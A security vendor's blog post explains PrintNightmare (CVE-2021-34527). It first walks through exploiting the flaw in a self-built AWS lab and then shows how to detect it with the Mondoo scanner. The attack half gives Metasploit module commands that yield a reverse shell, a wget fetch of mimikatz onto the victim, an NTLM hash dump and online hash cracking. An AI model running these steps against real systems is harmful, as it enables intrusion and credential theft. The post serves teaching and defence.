Vulnerabilities

How to Fix the PrintNightmare (CVE-2021-34527 / KB5004948) Vulnerability

This article lets you walk in a hacker's shoes. It provides step-by-step instructions for using the known PrintNightmare vulnerability to gain unpermitted access to a Windows system. It also shows you how to keep attackers from exploiting this and other vulnerabilities to steal, destroy, or ransom your business-critical data.

Mondoo_graphics_How to Fix the PrintNightmare

In simpler times, the biggest worries about the Windows Print Spooler were memory leaks and corrupted jobs. But in 2021, this service became a favorite pawn of some of the most destructive ransomware groups across the globe. A security researcher discovered a flaw in the Windows Print Spooler that allows a regular domain user to pose as SYSTEM and execute code on the domain controller. It became Windows vulnerability CVE-2021-34527 / KB5004948, commonly called PrintNightmare.

In this article, I'll walk you through the steps of hacking a Windows machine using the PrintNightmare vulnerability. And I'll show you how you can prevent vulnerabilities like PrintNightmare from inviting attackers into your infrastructure.

Hack a Windows system using PrintNightmare (CVE-2021-34527 / KB5004948)

To ethically penetrate a Windows system, we'll first create a lab environment and then perform the attack within that environment.

Deploy a Windows hacking lab

I created a Terraform template that makes it easy for you to deploy your own Windows hacking lab. This Terraform template deploys two virtual machines in your AWS account:

  • A vulnerable Windows machine
  • A Kali Linux machine that you'll use to attack the Windows machine

(We're deploying them in the same account just to make this process easy.)

Prerequisites

For this demonstration, you need:

Configure your environment

Before provisioning, set these Terraform environment variables:

VariableDescription
`TF_VAR_region`The AWS region where you want to provision the cluster
`TF_VAR_demo_name`A prefix of your choice to apply to all provisioned resources (such as `your_name`)
`TF_VAR_ssh_key`The AWS EC2 key pair for Kali Linux access
`TF_VAR_ssh_key_path`The path to the local SSH key for connecting to the attacker Kali Linux instance
`TF_VAR_publicIP`IP address of your home network to be applied to the security group for the Kali Linux, Ubuntu and Windows instance (such as `1.1.1.1/32`)

For example, I would open a terminal and run these commands:

export TF_VAR_region=us-east-1

export TF_VAR_demo_name=patrick

export TF_VAR_ssh_key=patrick-key

export TF_VAR_publicIP="1.1.1.1/32"

Provision a single environment

1. Clone the GitHub project:

git clone git@github.com:Lunalectric/windows-hack-demo.git

2. Change to the windows-hack-demo folder:

cd windows-hack-demo

3. Initialize the project (download the modules):

terraform init

4. Check that everything is ready:

terraform plan

5. Apply the configuration:

terraform apply -auto-approve

Once the provisioning completes, you see something like this:

Apply complete! Resources: 30 added, 0 changed, 0 destroyed.

Outputs:

hack_write_up = <<EOT
# Hack Windows machine

- login to your Kali machine
........

6. Build your hacking write-up, which is a set of instructions that generate specifically for you for this demonstration. It contains the exact commands to copy:

terraform output | sed "/^EOT/c\ " | sed "/hack_write_up = <<EOT/c\ " | sed 's/

Find and fix the security risks that pose the biggest threat to your business.

Exploit the PrintNightmare vulnerability in your hacking lab

Now that you've set up your hacking lab, let's hack into your lab's Windows machine using the PrintNightmare vulnerability. First you'll access the system, then you'll gain administrative control.

Hack into the Windows machine

1. In your terminal, connect to the Kali machine from which you'll do the hacking. Refer to your hack-write-up.md file for the address and password.

2. Open Metasploit (a popular, open source penetration testing tool):

msfconsole
msfconsole

3. When Metasploit finishes loading, retrieve the configuration to exploit the PrintNightmare vulnerability:

use exploit/windows/dcerpc/cve_2021_1675_printnightmare

4. Type `show options`:

msf-show-options
msf6-exploit

5. You want to target the RHOSTS and passwords. Enter these commands in succession:

set RHOSTS 10.0.4.105

set SMBUSER mondoo

set SMBPASS mondoo.com

set payload windows/x64/

run


The Kali machine connects to a port and sends the malicious code to the Windows operating system. The code executes on the Windows machine and creates a reverse shell.

Mondoo_graphics_windows hacking-01 (1)

6. Check the IP address to make sure you’re connected: Type `ipconfig`. If the IP address matches the RHOSTS, you have a successful shell in the machine. You've hacked in!

Gain root privileges

Now that you're in, you can gain root privileges. (That's almost always an attacker's next step.)

1. To get the NTLM hash of the administrator profile, first enter:

powershell

2. Download mimikatz:

wget "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210810-2/mimikatz_trunk.zip" -outfile "C:\windows\temp\mimikatz_trunk.zip"

3. Follow these steps:

a. Change the working directory.
b. Decompress the zip file.
c. Change the working directory again.
d. Execute mimikatz.
e. Get the NTLM hash:

cd "C:\windows\temp\mimikatz_trunk.zip"
	
Expand-Archive mimikatz_trunk.zip -Force

cd mimikatz_trunk\x64

.\mimikatz.exe

sekurlsa::msv
mimikatz

4. Once you have the NTLM hash, go to crackstation.net and enter it in the Hash Cracker. Now you have the clear text admin password.

You've successfully used PrintNightmare to gain administrative access to the Windows system.

Identify security issues that allow attackers into Windows systems

Are you a little unnerved by how easy it was to penetrate and take control of a Windows machine? How confident are you that all of the Windows systems in your fleet are free of the PrintNightmare vulnerability? And what about the hundreds of other gaps in Windows security? How can you be sure that your infrastructure doesn't have security problems that can lead to a complete Windows compromise?

In this section, we'll take on the role of protector instead of hacker. I'll walk you through the process of identifying risks in your Windows systems.

Prerequisite

For this demonstration, you need:

  • A Mondoo account. You can get one for free here.

Scan a Windows system

For this demonstration, I've set up a vagrant Windows machine that you can use.

1. Log in to the vagrant Windows 2016 system via Remote Desktop Protocol (RDP):

xfreerdp /u:Administrator /v::3389 /h:2048 /w:2048 /p:'Password1!'

2. Open Windows Powershell as an administrator.

unnamed-2

3. Install Mondoo Client:

A. Log into your account at console.mondoo.com

integrations

B. Go to the INTEGRATIONS page and select Windows.

integrations-windows

C. Set the Powershell execution policy:

Set-ExecutionPolicy RemoteSigned -scope CurrentUser

D. Copy the CLI commands that Mondoo provides and paste them in the Windows 2016 PowerShell.

mondoo-terminal

E. After the Mondoo Client installation finishes, add the Mondoo path and type mondoo status to verify that Mondoo Client is registered and working. It should look like this:

PS C:\Users\Administrator> $env:Path = 'C:\Program Files\Mondoo\;' + $env:Path

PS C:\Users\Administrator> mondoo status
→ loaded configuration from C:\ProgramData\Mondoo\mondoo.yml using source default
! could not determine client platform information
→ Time:         2022-10-23T17:38:15Z
→ Version:      7.0.2 (API Version: 7)
→ API ConnectionConfig: https://us.api.mondoo.com
→ API Status:   SERVING
→ API Time:     2022-10-23T17:38:15Z
→ API Version:  7
→ Space:        //captain.api.mondoo.app/spaces/hardcore-bassi-588565
→ Client:       //agents.api.mondoo.app/spaces/hardcore-bassi-588565/agents/2GXt8HJ0J8xG2xT4sTBUgtnY3nq

After a Windows restart, the installation path is automatically added to the PowerShell path variable.

F. Quickly verify that the following policies are enabled for your space:

  • Platform Overview Information by Mondoo
  • Platform End-of-Life Policy by Mondoo
  • Platform Vulnerability Policy by Mondoo
  • Windows Security by Mondoo

Your POLICY HUB should look like this:

mondoo-policy-hub

3. Run the Mondoo scan in PowerShell:

mondoo scan local

Mondoo Client connects to the Mondoo backend and downloads the enabled policies. After the scan, Mondoo Client reports results back to the Mondoo backend.

Mondoo scan results

Explore scan results in Mondoo Console

First, lets find the PrintNightmare vulnerability.

1. Select the report URL to open the Mondoo asset overview page, which shows the Windows 2016 asset.

unnamed(1)

2. Select Platform Vulnerabilities and then select Advisories.

platform-vulnerabilities-advisories

3. Search for KB5004948, which is the advisory for the PrintNightmare vulnerability we used earlier to access the windows machine.

printnightmare-advisory

Now let's look at the misconfiguration that allowed us to access to the NTLM hash of the administrator account:

1. On the Mondoo Console, select Policies and search for `Debug`.

debug

2. Click to expand the control. You see the description of the problem and how to remediate it.

unnamed (1)-1

By default on a Windows machine, the SeDebug privilege right is active. Whoever has this right can dump the lsass.exe Windows process. This process caches the NTLM hashes that are used during an active session or from a service. It's this caching that allowed us to gain administrative control of the Windows system.

Mondoo finds vulnerabilities like PrintNightmare and misconfigurations like SeDebug throughout your entire infrastructure—not just on Windows systems but on every platform, container, and VM, and so much more. Use your Mondoo account to keep scanning and discover how you can harden your system security. If you have questions, we're here to help.

Patrick Münch

Chief Information Security Officer (CISO) at Mondoo, Patrick is highly skilled at protecting and hacking every system he gets his hands on. He built a successful penetration testing and incident response team at SVA GmbH, their goal to increase the security level of companies and limit the impact of ransomware attacks. Now, as part of the Mondoo team, Patrick can help protect far more organizations from cybersecurity threats.

You might also like

Releases
Mondoo September 2024 Release Highlights
Releases
Mondoo August 2024 Release Highlights
Releases
Mondoo July 2024 Release Highlights